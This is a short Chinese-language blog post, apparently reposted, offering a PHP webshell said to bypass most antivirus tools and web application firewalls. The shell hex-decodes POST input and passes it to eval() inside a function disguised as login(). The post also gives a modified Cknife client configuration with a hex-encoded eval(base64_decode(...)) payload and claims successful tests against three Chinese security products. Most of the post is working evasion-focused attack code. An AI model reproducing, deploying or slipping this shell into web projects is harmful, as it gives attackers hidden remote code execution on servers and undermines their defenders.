过90% 安全软件和waf的PHP一句话。

lichun • 2018年9月29日 23:46:17 • 网络安全 • 阅读 1347

可能过90% 安全软件和waf的PHP一句话。
PHP代码：

<?php

function login(){

$t=$_POST[0];

for ($i=0;$i<strlen($t);$i+=2)

$c.=urldecode(“%”.substr($t,$i,2));

return $c;

}

eval(login());

?>

修改Cknife配置文件：
把：

PHP_MAKE=@eval\u0001(base64_decode($_POST[action]));

修改成

PHP_MAKE=406576616C286261736536345F6465636F646528245F504F53545B616374696F6E5D29293B

已测过D盾、安全狗、护卫神
其实还有一个更简短的方法，暂时不放出来了。。放的多容易被喷。

本文转载自网上。

原创文章，作者：lichun，如若转载，请注明出处：http://www.lichunseo.com/wlaq/2656.html